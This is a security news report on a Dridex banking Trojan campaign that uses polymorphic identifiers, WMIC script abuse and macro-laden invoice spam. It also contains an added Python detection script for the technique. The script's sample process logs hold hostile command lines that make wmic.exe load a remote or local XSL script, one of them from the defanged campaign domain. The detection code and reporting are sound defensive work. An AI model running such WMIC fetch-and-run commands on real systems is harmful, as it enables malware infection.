Dridex Employs Polymorphism in Recent Campaign

A recent campaign featuring the Dridex banking Trojan has shown extensive use of randomly generated variables and URL directories, eSentire’s security researchers reveal.

Around for more than half a decade, Dridex was one of the most prevalent banking malware families several years ago. Although activity surrounding it has decreased significantly over the past couple of years, Dridex has continued to receive updates that increase attack efficiency.

Some of the changes Dridex has seen over the years include the adoption of XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption. Featuring a dynamic configuration and web injections right from the start, the malware attempts to steal banking information from the victim’s system.

Attacks observed in June showed the malware getting around the common mitigation of disabling or blocking Windows Script Host, eSentire reports. The technique abuses the WMI command-line (WMIC) utility’s execution policy for XLS scripts to infect the target machines.
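A defender-side illustration of the WMIC abuse the article alludes to, written for this page rather than taken from the article or eSentire’s report: it triages constructed process-creation records and flags wmic.exe invocations whose /format switch points at a script file or URL instead of one of the tool’s built-in output formats (the exact command line used in the campaign is not given in the article, so the /format mechanism and the sample log lines are assumptions).

```python
"""Flag wmic.exe command lines that load an external stylesheet/script.

Added example, not part of the SecurityWeek article or eSentire's report.
Assumption: the WMIC technique referred to is the utility's /format
switch loading a script file or URL. All log lines below are constructed.
"""
import re
from urllib.parse import urlparse

# Constructed process-creation records: (parent image, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe",
     'wmic process list brief /format:"https://ssl-pert[.]com/a1b2c3/x.xsl"'),
    ("C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "wmic os get /FORMAT:C:\\Users\\Public\\rnd8823.xsl"),
    ("C:\\Windows\\System32\\cmd.exe", "wmic os get caption /format:list"),
    ("C:\\Windows\\explorer.exe", "notepad.exe C:\\temp\\notes.txt"),
]

# WMIC's built-in output formats render locally and are benign on their own.
BUILTIN_FORMATS = {"list", "table", "csv", "hform", "htable", "mof",
                   "rawxml", "textvaluelist", "value", "xml"}
FORMAT_RE = re.compile(r'/format:(?P<arg>"[^"]+"|\S+)', re.IGNORECASE)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")


def classify(parent_image: str, cmdline: str) -> str:
    """Return 'benign', 'suspicious' or 'high' for one process event."""
    if "wmic" not in cmdline.lower():
        return "benign"
    m = FORMAT_RE.search(cmdline)
    if not m:
        return "benign"
    arg = m.group("arg").strip('"')
    if arg.lower() in BUILTIN_FORMATS:
        return "benign"
    # A URL or file path handed to /format makes WMIC fetch and run a
    # script that lives outside the tool; defanged "[.]" is normalised first.
    remote = urlparse(arg.replace("[.]", ".")).scheme in ("http", "https")
    spawned_by_office = parent_image.lower().endswith(OFFICE_PARENTS)
    if remote or spawned_by_office:
        return "high"
    return "suspicious"


def triage(events):
    """Return (verdict, command line) for every non-benign event, in order."""
    hits = []
    for parent, cmd in events:
        verdict = classify(parent, cmd)
        if verdict != "benign":
            hits.append((verdict, cmd))
    return hits
```

Because the verdict keys on the parent process and the shape of the /format argument rather than on a hash, path or domain, it keeps working when the campaign rotates those indicators.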

The prevalent characteristic of the campaign is a constant shift in identifiers, the security researchers reveal. This has been ongoing for at least two weeks and is likely to continue, which makes it difficult for signature-based antivirus solutions to prevent infections.

“Given the same-day deployment and implementation of the ssl-pert[.]com domain on June 26th and a tendency to utilize randomly generated variables and URL directories, it is probable the actors behind this variant of Dridex will continue to change up indicators throughout the current campaign,” eSentire notes.

A similar polymorphism was observed in the supporting library as well, malware researcher and SANS ISC contributor Brad Duncan revealed a couple of weeks ago.

In attacks observed on June 17, the malware was using 64-bit DLLs loaded by legitimate Windows system executables. The file paths, file names, and associated hashes changed at every computer login, the researcher said.


The infection process begins with spam emails carrying malicious documents with embedded macros, which require some level of user interaction to be triggered. Once executed, the macros reach out to the ssl-pert[.]com domain to download the Dridex installer.

Just as with all spam, compromise can be avoided if email recipients are aware of the basic protections against such messages, including not opening attachments or clicking on links from unknown sources.

“Given email as the initial access point, employees are the first line of defense against this threat. Expect financial departments to be targeted by unsolicited invoices carrying malicious macros within. Some antivirus engines were able to detect (but not specify) the suspicious behavior,” eSentire concludes.

Related: Extensive ‘Living Off the Land’ Hides Stealthy Malware Campaign

Related: Popular Banking Trojans Share Loaders

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
